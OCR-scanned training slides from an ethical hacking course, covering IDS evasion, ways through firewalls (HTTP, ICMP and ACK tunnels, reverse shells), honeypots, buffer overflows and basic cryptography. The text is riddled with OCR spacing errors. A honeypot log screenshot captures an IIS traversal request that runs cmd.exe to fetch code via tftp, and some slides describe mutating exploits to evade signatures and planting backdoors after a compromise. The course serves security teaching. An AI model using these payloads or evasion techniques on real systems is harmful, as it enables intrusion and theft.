© Save a tracef i I e of the raw packets for I ater anal ysi s 

© Launch a separate program to handle the event 

© Terminate the TCP session - Forge a TCP FI N or RST 
packet to forceful ly termi nate the connection 
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Evading I DS Systems 



© M any simple network intrusion detection systems rely 
upon "pattern matching" 

© Attack scripts have well-known patterns, so simply 
compi I i ng a database of the output of known attack 
scripts provides pretty good detection, but can be easily 
evaded by si mply changi ng the scri pt 

© I DS evasi on focuses on foi I i ng si gnature matchi ng by 
altering an attacker' s appearance 

For example, some P0P3 servers are vulnerable to a 
buffer overflow when a long password is entered. 1 1 is 
easy to evade si mply by changi ng the attack scri pt 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



© Insertion 
© Evasion 
© Denial -of- service 
© Complex Attacks 
© Obfuscation 

© Desynchronization - Post Connection SYN 
© Desynchronization-Pre Connection 
© Fragmentation 
© Session Splicing 
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Tools to Evade ID! 



© Sidestep 

©AD Mutate 

© Mendaxv. 0.7.1 

© Sti ck 

© Fragrouter 

© Anzen NIDSbench 
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DS Evading Tool : Admutate 



I 



http://www.ktwo.ca/security.htnnl 

©ADM utate accepts a buffer overflow exploit as 
input and randomly creates a functionally 
equivalent version which bypasses I DS 

© Once a new attack is known, it usually takes the 
I DS vendors a nunnber of hours or days to 
develop a signature. But i n the case of 
ADM utate, it has taken months for signature- 
based I DS vendors to add a way to detect a 
polymorphic buffer overflow generated by it 
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I DS Software Vendors 



© Black ICE by Network ICE 
(http://www.networkice.conn) 

© CyberCop Monitor by Network Associates, I nc. 
(http://www.nai.conn) 

© Real Secure by I nternet Security Systems (I SS) 
( http :/ / www. I SS. n et) 

© NetRanger by Wheel Group/ Cisco 
(http://www.wheelgroup.com) 

© eTrust I ntrusion Detection by Computer Associates 
(http://www.cai.com) 

© NetProwler by Axent (http://www.axent.com) 

© Centrax by Cybersafe (http://www.cybersafe.com) 

© NFR by Network Flight Recorder (http://www.nfr.net) 

© Dragon by Security Wizards (http:// www.network- 
defense.com) 
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I 

© Aicmpsend LIO (http://www.elxsi.de/) 
© Blast v2.0 

( http://www.foundstone.com/ rdl abs/ bl astbeta. html ) 

© CyberCop Scanner's CASL (http://www.nai.com) 

© EttercapO.LO (http://ettercap.sourceforge.net/) 

© Hping2 beta 54 (http://www.kyuzz.org/antirez/hping/) 

© I CM Push 2.2 (http://hispachack.ccc.de/) 

© IPsend (http://www.coombs.anu.edu.au/ ^aval on) 

© Libnet (http://www.packetfactory.net/libnet) 

© M GEN Toolset 3.2 

(http://manimac.itd.nrl.navy.mil/MGEN/) 

© Net::RawlP (http://www.quake.skif.net/RawlP) 

© SING LI (http://sourceforge.net/ projects/ sing) 



Packet Generators 
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What is a Firewall? 



© A combination of hardware and 
software that secures access to and 
from the LAN 

© There are three mai n types of 
firewall architecture 

• Packet Filtering 

• Proxy- based 

• State Full Packet Filtering 
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■ 



© Listed bdow are a few techniques that 
can be used to effectively determi ne the 
type, version, and rules of almost every 
f i rewal I on a network 

• Port Scanning 

• Fi rewal king 

• Banner Grabbing 



J 



Firewall Identification 
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Firewa king 




© F i rewal ki ng i s a method 
used to col I ect i nf ormati on 
of rennote networks that 
are behind fi rewal! s 

© 1 1 probes ACLs on packet 
filtering routers/ firewalls 

© F irewalking requires 
three hosts: 

• F irewalking Host 

• Gateway H est 

• Destination Host 



Hop n+ m (nn>1 



Destination Host 
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Banner Grabbing 



I 



© Ban ners are messages sent out by network servi ces 
during connection to the service 

© Banners announce which service is running on the 
system 

© Banner grabbing is a very simple method of OS 
detection 

© Banner grabbing also helps in detecting services run by 
fi rewalls 

© The three main services which send out banners are 
FTP, telnet, and web servers 

© Exampleof SMTP banner grabbing is 

tel net mai I .targetcompany.org 25 
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Breaching Firewalls 



■ 



© One of the easiest and most common ways for an 
attacker to si i p by a f i rewal I i s by i nstal ling some 
network software on an internal system that 
communicates using a port address permitted by the 
fi rewal I 's configuration 

© A popular port to use is TCP port 53, normally used by 
DNS 

© M any f i rewal I s per mi t al I traff i c usi ng port 53 by 
default becauseit simplifies firewall configuration and 
reduces support calls 
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Bypassi ng a F i rewal I U si ng H ttptunne 



©Httptunnel creates a bi-directional virtual data path 
tunneled in HTTP requests. The requests can be sent via 
an HTTP proxy, if desired 



C : \W INDOWS\System 3 2\cm d . exE 



unnel 3.3>litc —help 

Isage: htc [OPTION]... HOST [: PORT! 

Jet up a httptunnel connection to PORT at HOST (default port is 8888>. 

Jhen a connection is nade , 1^0 is redirected from the source specified 

jy the deuice, forward— port or stdin— stdout switch to the tunnel. 



— fl, — proxy— author Ih at ion USER: 

— H, — proxy— author Ih at ion— f ile 

— B, — proxy— buf f er—s iHe BVTES 

-c, content-length BVTES 

-d, — deuice DEUICE 

-F, — forward-port PORT 

— h, — help 

k, — keep-aliue SECONDS 

— M, max— connect ion— age SEC 

-P, — proxy HOSTNAME [: PORT] 

— s, — stdin— stdout 

— S, — strict— content— length 

— T, timeout TIME 

-U, user-agent STRING 

— U, — version 

— w, — no— daemon 
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PflSSUORD proxy authorization 

FILE proxy authorisation file 

assume a proxy buffer size of BVTES bytes 

<lt, M, and G postfixes recogniHed> 

use HTTP PUT requests of BVTES size 

<k, M, and G postfixes recogniHed> 

use DEUICE for input and output 

use TCP port PORT for input and output 

display this help and exit 

send keepaliue bytes every SECONDS seconds 
(default is 5> 

maximum time a connection will stay 
open is SEC seconds (default is 300> 
use a HTTP proxy (default port is S0S0y 
use stdin^stdout for communication 
(implies — no— daemon> 

always write Content— Length bytes in requests 
timeout, in milliseconds, before sending 
padding to a buffering proxy 

specify User— Agent value in HTTP requests 
output version information and exit 
don't fork into the background 
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Placing Backdoors Through Firewalls 



I 



The Reverse WWW Shell 

© This backdoor should work through any firewall that 
al lows users to surf the www. A program is run on the 
i nternal host, whi ch spawns a chi I d every day at a 
speci al ti me 

© For the firewall, this chi Id acts I ike a user; using the 
browser cl i ent to surf the Internet. In reality, this child 
executes a local shel I and connects to the www server 
operated by the hacker on the I nternet via a legitimate- 
looking http request, and sends a stand-by signal 

© The I egi ti mate- 1 ooki ng answer of the www server 
operated by the hacker is, in reality, the command the 
child will execute on its machine in the local shell 
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H iding Behind a Covert Channel: 
LOKI 



© LOKI is an information tunneling program. 
LOKI uses I nternet Control M essage Protocol 
(I CM P) echo response packets to carry its 
payload. I CM P echo response packets are 
normally received by the Ping program, and 
many fi rewal Is permit responses to pass 

© Simple shell commands are used to tunnel 
inside ICMP_ECHO/ICMP_ECHOREPLY 
and DNS name lookup query/ reply traffic. To 
the network protocol analyzer, this traffic 
seems I i ke ordi nary beni gn packets of the 
correspond i ng protocol . H owever, to the 
correct listener ( the LOKI 2 daemon), the 
packets are recognized for what they real ly are 
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ACKTunneing 



© Trojans normally use ordinary TCP or UDP 
comnnunication between their client and server 
parts 

© Any f i rewal I between the attacker and the 
vi cti m that bl ocks i ncomi ng traff i c wi 1 1 usual I y 
stop all Trojans from working. I CMP tunneling 
has existed for quite some time now, and 
bl ocki ng I CM P i n the f i rewal I i s consi dered 
safe 

© ACK Tunnel i ng works through f i rewal Is that 
do not apply their rule sets on TCP ACK 
segments (ordi nary packet fi Iters belong to this 
class of firewalls) 
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I 



0 007 Shell 

• 007 Shell is a Covert Shell I CMP tunneling program. It works 
similar to LOKI 

• 007 Shel I works by putti ng data streams i n the I CM P message 
past the usual 4 bytes (8- bit type, 8- bit code, and 16- bit 
checksum) 

0 I CMP Shell 

• I CM P Shel I ( I SH ) i s a tel net- 1 i ke protocol . 1 1 provi des the 
capabi I ity of connecti ng a remote host to open a shel I usi ng 
only I CM P for i nput and output 

• The I SH server runs as a daemon on the server side. When the 
server receives a request from the client, it will stri p the header 
and look at the ID field. If it matches the server's ID, then it will 
pipe the data to "/bin/sh" 

• 1 1 wi 1 1 then read the results from the pi pe and send them back 
to the cl i ent, where the cl i ent then pr i nts the data to stdout 
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Tools to Breach Firewalls 



I 

0 AckCmd 

•AckCmd is a cl i ent/ server combination for Windows 2000 that opens 
a remote command prompt to another system (runni ng the server part 
of AckCmd) 

•It communicates using only TCP ACK segments. This way the client 
component is ableto directly contact the server component through 
f i rewal I i n some cases 



C:\WINDOWS\System32\cmd.exe - ackcmdc 1 27.0.0.7 








C:\Docunents and Sett insfsNOwnerSMv DocunentsNEthical Hackinsr Lab Files u2 
insf\Module 19 - Hacking UPN, Routers and Fireualls\ackcnd>ackcnds 


.3\Hack 




C:\Docunents and Sett insfsNOwnerSMv DocunentsNEthical Hackinsr Lab Files u2 
ing\Module 19 - Hacking UPN, Routers and Fireualls\ackcnd>ackcndc 127.0.0 


.3\Hack 
.7 




OckCmd 1.1 - The Ack Connand Pronpt for Uindous 2000 

- <c> 2000, firne Uidstron, arne .uidstronPntsecuritv-nu 

- For instructions see http://ntsecuritv.nu/toolbox/ackcnd/ 








Type "quit" and press Enter to quit 








ftckCnd> 
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Tools to Breach Firewalls 



© Covert TCP LO 

• Covert_TCP LO manipulatestheTCP/l P header to 
transfer a f i I e, one byte at a ti me, to a desti nati on 
host 

• Data can be transmitted by conceal i ng it i n the I P 
header 

• Thistechnique helps in breaching a firewall from 
i nsi de, as wel I as exporti ng data with i nnocent- 

I ooki ng packets that contai n i nsuff i ci ent data for 
sniffers or fi rewal Is to analyze 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Common Tool for Testing Firewall and 
IDS 



© F i rewal I Tester 

• Written by Andrea Barisani , who is a system 
administrator and security consultant 

• F i rewal I Tester i s a tool desi gned for testi ng f i rewal I s 
and I ntrusion Detection Systems 

• 1 1 i s based on a cl i ent/ server arch i tectu re for 
generating real TCP/I P connections 

• The cl i ent i s a packet generator tool (ftest) , whi I e the 
server (ftestd) is an intelligent network listener 
capable of processi ng and repiyi ng to ftest- generated 
packets. All packets generated by ftest have a special 
signature encoded in the payload that permits 
identification 
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What I s a H oneypot? 



■ 



© A honeypot is an information system resource 
whosevalueliesin unauthorized or illicit use of 
that resource 

© It has no production value; anything going to or 
from a honeypot is likely a probe, attack, or 
compromise 

© A honeypot can be used to log access attempts 
to those ports i ncl udi ng the attacker's 
keystrokes. This could give advanced warnings 
of a more concerted attack 
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TheHoneynet Project 



1 



© Founded in April 1999, 'TheHoneynet Project" 
is a non-profit research organization of security 
professionals, dedicated to information security 

© All the work of the organization is open source 
and shared with the security community 

© The Project intends on providing additional 
information on hackers; such as their motives 
in attacking, how they communicate, when they 
attack systems, and their actions after 
compromisi ng a system 

© The Honeynet Project is a four- phased project 
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Types of H oneypots 



© H oneypots are cl assi f i ed i nto two basi c 
categories 

• Low- i nteracti on honeypot 

Eg: Specter, Honeyd, and KFSensor 

• H i gh- i nteracti on lioneypot 
Eg: Honeynets 
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Advantages and Disadvantages of a 
H oneypot 



© Advantages are: 

• Col I ects smal I data sets of hi gh val ue 

• Reduces false positives 

• Catches new attacks, reduces false negatives 

• Works in encrypted or I Pv6 environments 

• Simple concept requiring minimal resources 

© Disadvantages are: 

• L i mi ted f i el d of vi ew ( mi croscope) 

• Risk (mainly high-interaction honeypots) 
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Whereto Placea Honeypot? 



© A honeypot should be placed in front of the 
firewall on the DM Z 

© Check for the fol I owl ng whi I e pi aci ng 
honeypots: 

• Router-addressable 

• Static address 

• Not subjected to a fixed location for a long 
time 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 



H oneypots 



There are both commercial and open source H oneypots avai lable on the I nternet 
© Commercial H oneypots 

• KF Sensor 

• NetBait 

• M anTrap 

• Specter 

© Open Source H oneypots 

• B u bbl egu m P roxypot 

• J ackpot 

• BackOfficer Friendly 

• Bait-n-Switch 

• Bigeye 

• H oneyWeb 

• Deception Toolkit 

• LaBreaTarpit 

• H oneyd 

• H oneynets 

• Sendmail SPAM Trap 

• TinyHoneypot 
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Honeypot-SPECTER 



I 



© SPECTER is a smart honeypot or deception system 

© SPECTER automatically investigates the attacl<ers while 
they are sti 1 1 tryi ng to break i n 
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Honeypot-honeyd 



© Honeyd is maintained and developed by Niels 
Proves, a software engi neer at google 

© H oneyd is a smal I daemon that creates vi rtual 
hosts on a network 

© H oneyd is open source software released 
under GNU General Public License 
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H oneypot-KFSensor 




KF Sensor is a host- 
based I ntrusi on 
Detecti on System 
(IDS) that acts as a 
honeypot to attract 
and log potential 
hackers and port 
scanner-kiddies by 
si mulating 
vulnerable system 
services and even 
Trojans 
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5erver 



^ Running 
|j Stopped 
5 Error 

Ports 



I No recent activity 

I Recent Activity 

1^1 Very Recent Activity 

■^1 Inactive 

I Error 



Visitors 

^ No recent activity 

^ Activity 

^ Very Recent Activity 



Events 

<SP Normal Event 
<^ Alert 
(SP High Alert 



start Time; 



17/12/2002 18;45;36,623 



End Time; j 17/12/2002 18;45;36,623 
Description; 



Event ID; 
Type; 



418 



Connection 



Visitor 
IP; 

Domain; 

Sensor 
IP; 

Bound; 
Action; 



217,39,205,180 



Port; 



4779 



host 2 17-39-205-1 80, in-addr,btopen world, com 



217.39.97.38 



SimEianner 



Port; 
Protocol; 
Sim Server; 



80 




TCP 


httpApache 





Details — 
Closed By; 

Received; 



Server 



Limit Exceeded: 



GET /scripts/, ,%%35%63. ,/winnt/system32/cmd,exe?/cH-tftp%20-i%2 
Host; www I; 
Connnection; close 



Response; 



HTTP/1,1 200 OK 

Date; Tue, 17 Dec 2002 18;45;36 GMT 
Server; Apache/2.0.39 (Win32) 
Connection[jasper]; close 



2.1 



r 



Next 



Previous 



Close 
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Sebek 



I 



© Sebek is a data capture 
tool 

© The f i rst versi ons of 
Sebek were desi gned to 
col lect keystroke data from 
directly within the kernel 

© Sebek also provides the 
ability to monitor the 
i nternal worki ngs of the 
honeypot in a glass- box 
manner, as compared to the 
previous black- box 
techniques 
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Honeywall 



3ib&k Server 
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Physical and Virtual Honeypots 



I 



Physical Honeypots 


Virtual Honeypots 


A 1 '11 J_ ■ 

A physical honeypot is a 
real machine on the 
network with its own 1 P 
address 


A * J_ 1 1 J_ ■ 

A Virtual honeypot is 
si mulated by another 
machi ne that responds to 
network traff i c sent to the 
virtual honeypot 


Physical honeypots are 
often high- interaction, so 
al 1 owi ng the system to be 
compromi sed compi etel y, 
they are expensive to 
i nstal 1 and mai ntai n 


For large address spaces, 
it is impractical or 
1 mpossi bl e to depi oy a 
physical honeypot for 
each 1 P address. 1 n that 
case, virtual honeypots 
can be deployed 
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Tools to Detect Honeypots 



© Send- Safe H oneypot H unter 

• Send-Safe H oneypot H unter is a tool designed for 
checl<ing lists of HTTPS and SOCKS proxies for so- 
called "honeypots" 

© Nessus Security Scanner 

• The Nessus Security Scanner includes NASL (Nessus 
Attack Scripting Language); a language designed to 
write security tests easily and quickly 

• N essus has the abi I i ty to test SSL i zed servi ces such as 
https, smtps, imaps, and more. Nessus can be 
provided with a certificate so that it can be 

i ntegrated i nto a PKI -fied envi ronment 
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I 



© Incident response team 

Set up an "incident response team." Identify those people who 
should be called whenever peoplesuspect an intrusion in progress. 

© Response procedure 

Priorities between network uptime and intrusion should be 
decided. Whether or not to pull the network plug on suspecting 
intrusion should be decided. Should continued intrusion be 
al lowed i n order to gather evi dence agai nst the i ntruder? 

© Lines of communication 

M ode of propagati ng the i nformation through corporate 
hierarchies, from the immediate supervisor up to the CEO. 
Decision to inform the FBI or police. Notifying partners 
(vendors/ customers) . 
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Summary 



©I ntrusion Detection Systems 
(I DS) monitor pacl<ets on the 
networl< wi re and attempt to 
discover if a hacker/ hacker is 
tryi ng to breal< i nto a system 

©System I ntegrity Verifiers (SIV) 
monitor system fi les to fi nd when 
an i ntruder changes. Tr i pwi re i s 
one of the popul ar SI Vs 

©Intrusion Detection happens 
either by Anomaly detection or 
Signature recognition 

©An I DS consists of a special 
TCP/ 1 P stack that reassembles I P 
datagrams and TCP streams 

©H oneypots are programs that 
simulate one or more network 
servi ces that are desi gnated on 
computer's ports 
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©A simple Protocol verification 
system can flag invalid packets. 
This can include valid, but 
suspicious, behavior such as 
several fragmented I P packets 

©I n order to effectively detect 
i ntrusi ons that use i n val i d 
Drotocol behavior, I DS must re- 
mpl ement a wi de var i ety of 
appi i cati on- 1 ayer protocol s to 
detect suspi ci ous or i nval i d 
behavior 

©One of the easiest and most 
common ways for an attacker to 
slip by afirewall is by installing 
network software on an internal 
system that uses a port address 
permitted by the f i rewall 's 
configuration 
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Ethical Hacking 



ModuleXX 
Buffer Overflows 



Module Objective 



© Why are programs/ appi ications vul nerable? 

© What is a buffer overflow? 

© Reasons for buffer overflow attacks 

© Skills required 

© Types of buffer overfl ow 

© Understanding stacks 

© Shell code 

© H ow to detect buffer overfl ows i n a program 

© Technical details 

© Defense agai nst buffer overflows 
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Flow Diagram for the Module 



applications 



Types of ^ 
^ buffer overflows 



buffer overflows 



Skills required 



Reasons for 
buffer overflow attacks 



Shell code ^ 



U nderstandi ng stacks 




ttacki ng 
a real program 



Counter measures 
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I naer standing 
assembly code 



P 



buffer overflow 



buffer overflow 
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Scenario 



1 1 was a J ob that Ti m wanted ri ght from the start 
of his career. Bei ng a Project M anager of a wel - 
known software f i rm was defi ni tely a si gn of 
prestige. But now hiscredibility wasat stal<e!!! 

The I ast proj ect that Ti m hand I ed f ai I ed to del i ver 
because the application crashed. The customer of 
Ti m's company suffered a huge financial loss. 




At the back of his mind, something was nagging 
Tim... 

H ad he asked his Test E ngi neers to do a thorough 
lesti ng of the del i vered package, this wou d not 
have happened... 
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Scenario (cont.) 



Si nee the project was running behind schedule, he 
had to hurry through testing. 



Tim had worked with the same team for his 
previous projects. I n addition, all the other 
projects had successful conclusions. Therefore, he 
was under the notion that nothing would possibly 
go wrong. This notion made him over- confident 
about the testi ng of thi s proj ect. 

But thi s ti me, he was not I ucky. The web server of 
the client company had succumbed to a buffer 
overf I ow attack. Thi s was due to a f I aw i n codi ng 
as bounds were not checked. 



1 



I s Ti m's deci si on j usti f i ed? 
Now, what's next? 
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Real World Scenario 



I 



On Oct. 19, 2000, hundredsof flights were grounded or delayed 
because of a software probi em i n the Los Angel es ai r traff i c 
control system. The cause was attri buted to a M exican 
control I er typi ng 9 ( i nstead of 5) characters of f I i ght- 
description data, resulting in a buffer overflow. 
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Why are Programs/ Applications 
Vulnerable? 



©Si nee there is lot of pressure on the del i verables; 
programmers are bound to make mistakes which a 
overl ooked most of the ti me 




© Boundary checks are not done or i n most cases they 
are ski pped 




© Programming language, such as C, which 
programmers sti 1 1 use to devel op packages or 
applications, have errors in it 

© ThestrcatO, strcpyO, sprintfO, vsprintfO, bcopyO, 
getsO, and scanfO calls in C language can be exploited 
because these functions don't check to see if the 
buffer, allocated on the stack, is large enough for the 
data copi ed i nto the buffer 

© Good programming practices are not adhered to 
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Buffer Overflows 



I 



A buffer overrun is when a program allocates a block of memory of a certain 
length and then tries to stuff too much data into the buffer, with extra 
overflowing and overwriting possibly critical information crucial to the 
normal execution of the program. Consider the following source code: 

When the source is compiled and turned into a program and the program is run, it 
will assign a block of memory 32 bytes long to hold the name string 

#include<stdio.h> 
int main ( int argc , char **argv) 
{ 

char target[5]="TTTT"; 

char attacker[l 1]="AAAAAAAAAA"; 

strcpyC attacker," DDDDDDDDDDDDDD"); 

printf("% \n",target); 

return 0; 

} 

This type of vulnerability is prevalent in UNIX- and NT-based systems 
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Reasons for Buffer Overflow Attacks 



©Buffer overflow attacks depend on two things: the lack of 
boundary test! ng and a machi ne that can execute code that 
resi des 1 n the data/ stack segment. 

©Thelackof boundary is very connnnon and usually the 
program ends with segmentation fault or bus error. I n order to 
exploit buffer overflow to gain access or escalate privileges, the 
offender must create the data to be fed to the application. 

©Random data will generate a segmentation fault or bus error, 
never a remote shel I or the execution of a command. 
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Knowledge Required to Program 
Buffer Overflow Exploits 



L C functions and the stack 

2. A little knowledge of assembly/ machine language 

3. How system calls are made ( at the machine code level) 

4. exec( ) system calls 

5. H ow to guess some key parameters 
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Types of Buffer Overf ows 



© Stack- Based Buffer Overflow 
© H eap/ BSS- Based Buffer Overf I ow 
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stack- Based Buffer Overflow 



© Buffer is expecting a maximunn number of guests. 

© Send the buffer more than x guests. 

© I f the system does not perform boundary checl<s, extra 
guests continue to be placed at positions beyond the 
legitimate locations within the buffer. (J ava does not 
permit to run off the end of an array or stri ng as C and 
C++ do.) 

© M al i ci ous code can be pushed on the stack. 

© The overflow can overwrite the return pointer so that 
the flow of control switches to the malicious code. 
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Understanding Assembly Language 



Two most important operations in a stacl<: 

• 1 Push - put one itenn on the top of the stack 

• 2. Pop - "rennove" one itenn fronn the top of thestack 

• Typically returns the contents pointed to by a pointer and 
changes the poi nter (not the nnennory contents) 

EIP The extended instruction pointer. This point to the code that you are currently 
executing. When you call a function, this gets saved on the stack for later use. 

ESP The extended stack pointer. This points to the current position on the stack 
and allows things to be added and removed from the stack using push and pop 
operations or direct stack pointer manipulations. 

■ EBP The extended base pointer. This register should stay the same throughout 
the lifetime of the function. It serves as a static point for referencing stack-based 
information like vahables and data in a function using offsets. This almost always 
points to the top of the stack for a function . | 
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L i 



Understanding 



© Thestackisa(LIFO) 
mechanism that 
computers use both to 
Dass arguments to 
'unctions and to 
reference local variables 

© 1 1 acts I i ke a buffer, 
holding all of the 
information that the 
function needs 

© The stack is created at 
the beginning of a 
function and released at 
the end of it 
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Bottom of 
Memory 



BP 

anywhere 
within the 
stack 
frame 



Top of 
Memory 



Buffer 2 
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A N ormal Stack 





args 



CIP 



saved registers 



local variables 



arcis 



saved registers 



local variables 



T 
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etop 
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Shell code 



© Shdlcode is a method used to exploit stacl<- 
based overflows 

© Shell codes exploit computer bugs in how the 
stack is handled 

© Buffers are soft targets for attackers as they 
overflow very easi ly if the conditions match 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 



Heap-Based Buffer Overflow 



© Variables that are dynamically allocated with 
functions, such as mallocO, are created on the 
heap. 

© Heap is a memory which is dynamically 
allocated. 1 1 is different from the memory which 
is allocated for stack and code. 

© I n a heap- based buffer overflow attack, an 
attacker overflows a buffer which is placed on 
the lower part of heap, overwriting other 
dynamic variables, which can have unexpected 
and unwanted effects 
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H ow to Detect Buffer Overflows i n a 
Program 



There are two ways to detect buffer overflows: 

• The first one is looking at the source code. In this 
case, the hacker can look for strings declared as local 
variables in functions or methods and verify the 
presence of boundary checks. 1 1 is also necessary to 
check for i mproper use of standard functions, 
especial ly those related to stri ngs and i nput/ output. 

• Thesecond way is by feeding the application with 
huge amounts of data and check for abnormal 
behavior. 
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Attacking a Real Program 



© Assuming that a String fundi on is being exploited, tlie 
attacl<er can send a long stri ng as the i nput 

© This stri ng overflows the buffer and causes a 
segmentation error 

© The return pointer of the fundi on is overwritten and 
the attacker succeeds i n alter i ng the f I ow of executi on 

© I f he has to i nsert his code i n the i nput, he has to: 

• Know the exact address on the stack 

• Know the si ze of the stack 

• Make the return pointer point to his code for execution 
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© Most CPUs have a No 
Operation (NOP) 
instruction - it does 
nothing but advance 
the instruction 
pointer. 

© Usually we can put 
some of these ahead 
of our program (in 
the string). 

© As long as the new 
return address points 
to a NOP, we are OK. 



Attacker pads the begi nni ng of the 
intended buffer overflow with a 
long run of NOP instructions (a 
NOP slide or sled) so the CPU will 
do nothing until it gets to the 'main 
event' (which preceded the 'return 
pointer'). 

Most intrusion detection Systems 
(IDS) look for signatures of NOP 
sleds. ADM utate (by K2) accepts a 
buffer overflow exploit as input 
and randomly creates a 
functionally equivalent version 
(polymorphism). 
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H ow to M utate a Buffer Overflow 
Exploit 



For the NOP portion 

Randomly replacethe NOPs with functionally 
equivalent segments of code (e.g.: x++; x-; ? NOP NOP). 

For the "main event" 

Apply XOR to combine code with a random key 
unintelligible to I DS. The CPU code must also decode 
the gibberish in time in order to run the decoder. By 
itself, the decoder is polymorphic and therefore hard to 
spot. 

For the "return pointer" 
Randomly tweak LSB of pointer to land in theNOP- 



zone. 
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Once the stack is Smashed... 



i 

Once the vulnerable process is connnnandeered, the 
attacker has the same pri vileges as the process and can 
gain normal access. He can then exploit a local buffer 
overflow vul nerabi I ity to gai n super- user access. 

Create a backdoor 

Using (UNIX-specific) inetd 

Using Trivial FTP (TFTP) included with Windows 2000 
and some U N I X f I avors 

Use Netcat to make raw, i nteracti ve connection 

Shoot back an Xterminal connection 

UNIX-specific GUI 
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Defense Against Buffer Overflows 



© Manual auditing of 
code 

© Disabling stacl< 
executi on 

© Safer C I i brary 
support 

© Compi I er 
techniques 
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Tool to Defend Buffer Overflow: 
Return Address Defender (RAD) 



© RAD is a si mple patch for the compiler that 
automatically creates a safe area to store a copy 
of return addresses 

© After that, RAD automatically adds protection 
code i nto appi i cations that it compi les to defend 
programs against buffer overflow attacks 

© RAD does not change the stack I ayout 
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Tool to Defend against Buffer 
Overflow: StackGuard 



© StackGuard: Protects systems from stack smashi ng 
attacks. 

© StackGuard is a compiler approach for defending 
programs and systems against "stack smashing" attack. 

© Programs that have been compiled with StackGuard are 
largely immune to stack smashing attack. 

© Protection requires no source code changes at all. When 
a vulnerability is exploited, StackGuard detects the 
attack in progress, raises an intrusion alert, and halts 
the victim program. 

http://www.cse.ogi .edu/ Dl SC/ projects/ immunix/ StackGuard/ 
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Tool to Defend Buffer Overflow: 
I mmunix System 



© I mmunix System 7 is an I mmunix-enabled RedHat 
Linux 7.0 distribution and suite of application- 1 eve! 
security tools. 

© I mmunix secures a Linux OS and applications. 

© I mmunix works by hardening existing software 
components and platforms so that attempts to exploit 
security vulnerabilities will fail safe. That is, the 
compromised process halts instead of giving control to 
the attacker, and then is restarted. 

http://immunix.org 
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Vulnerabi ity Search - 1 CAT 



Welcome to fCAV. 



ICAT contains: 
5905 vulnerabilities 

Last updated: 
07/24/B3 

ICAT is a searchable 
index of information on 
computer vulnerabilities. 
It provides search 
capability at a fine 
granularity and links 
users to vulnerability 
and patch information. 

Enteryour e-mail address and 
press "Add" to receive ICAT 
annouricements. 



The ICAT team 
appreciates the 
contributions and 
support of the following 
organizations: CERIAS, 
FedCIRC, ISS X- 



Search tips: 

All drop down menus are ANDed together to create a query. 

Click a link below to look up vulnerabilities by vendor or product name 

'_' represents non -alphabetic characters 

Double-quotes are ignored in text-search; Individual words are ANDed together. 



Search-> 

Vendor 
Product 
Version 

Keyword search 

(try a CVE or CAN name) 

Severity 



All entries | 


1 Year | 


6 Months 1 


3 Months 1 


Reset values | 




A..B C..E F..H I..K 


L.N 0..Q R..T U..W X..Z Al 



_..A..B C..E F..H I..K L.N 0..Q 

— choose a Vendor or Product — 

microsoft 



R..T U..W X..Z All 



I High 




Any.. 



f 



General Filters: 
Common Sources 
Related exploit range 
Vulnerability consequence Any 
Vulnerability type 
Exposed component type Any 
Entry type 

Entries since the following 



date 



Remote 



(buffer overflow) 



CVE entries 





1 Any Month 


2003 





~3 
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Summary 



© A buffer overflow occurs when a program or process 
tries to store more data i n a buffer (temporary data 
storage area) than it was intended to hold 

© Buffer overflow attacks depend on two thi ngs: the lack 
of boundary testing and a machine that can execute 
code that resi des i n the data/ stack segment 

© Buffer overf I ows vul nerabi I i ty can be detected by ski 1 1 ed 
auditi ng of the code as wel I as boundary testi ng 

© Once the stack is smashed, the attacker can deploy his 
payload and take control of the attacked system 

© Counter measures include: checking the code, disabling 
stack execution, Safer C library support, and using safer 
compiler techniques 

© Tools like stackguard, Immunix, and vulnerability 
scanners help in securing systems 
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Ethical Hacki 



ModuleXXI 
Cryptography 



Module Objective 



© WhatisPKI 

© RSA 
© MD-5 
© SHA 
© SSL 
© PGP 
© SSH 

© Encryption Cracking Techniques 
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Modu eF ow 



Description of 
PKIs 



Digital 




RSA 
and Attacl<s 



SSL 
Description 




Description 



IVID5 
Description 




GAK 
Description 



RSA 
Challenge 



Hacking Tools 
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Public- key Cryptography 



© Publ i c- key cryptography was i n vented i n 1976 by 
Whitfield Diffieand Martin Hellman. 

© I n this system, each person gets a pai r of l<eys, called 
the public key and the private key. 

© Each person's public key is published while the private 
key is kept secret. 

© Anyone can send a confidential message using public 
information, but it can only be decrypted with a private 
key that i s i n the sol e possessi on of the i ntended 
recipient. 
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Working of Encryption 
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RSA (Rivest Shamir Adieman) 



i 

© RSA i s a publ i c- key cryptosystem devel oped by M I T 
professors Ronald L. Rivest, Adi Shamir, and Leonard 
|V| . Adieman i n 1977 i n an effort to liei p ensure I nternet 
security. 

© RSA uses modular arithmetic and elementary number 
theory to do computations usi ng two very large pri me 
numbers. 

© RSA encryption is widely used and is the de-facto 
encryption standard. 
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Example of RSA Algorithm 







<- 


first prime number (destroy this after computing E and D] 


Q 


= 53 


<- 


second prime number (destroy" this after computing E and D) 


PQ 


= 3233 


<- 


modulus [give this to others) 


E 


= 17 


<;- 


public eKponent (give zhis to ozhsTLS) 


D 


= 2753 


<- 


private exponent (Dreep this secret!) 



Vour public key is (E,PO) ■ 
Your private key is D . 



The encryption function is: 



encrypt (T) = (T'^E) wod PQ 

= (T-^17) mod 3233 



The decryption function is: 



decrypt (C) = [C^D] mod PQ 

= (C^2753) mod 3233 



To encrypt the plaintext value 123, do this: 



encrypt(123) = (123^17) mod 3233 

= 337587917446653715596592958817679803 mod 3233 
= 855 



To decrypt the ciphertext value 855, do this: 



decrypt (855) = (855^2753) 
= 123 



mod 3233 
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RC4, RC5, RC6, Blowfish 



A 1 nr\ir'i "hhm 
Ml LjUi 1 LI II 1 1 


r tjdLUI CD 


Rc4 


It is a variable key- size stream cipher with byte- oriented 
operations and is based on the use of a random 
permutation. 


Rc5 


It is a parameterized algorithm with a variable block 
size, key size, and a variable number of rounds. 


Rc6 


RC6 adds two features to RC5: the i ncl usi on of i nteger 
mu 1 ti pi i cati on and the use of f ou r 4- bi t wor ki ng regi sters 
instead of RCS'stwo 2-bit registers. 


Blowfish 


1 1 is a 64 bit block ci pher that uses a key length that can 
vary between 32 and 448 bits. 
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© 40 bit key algorithms are of no use. 

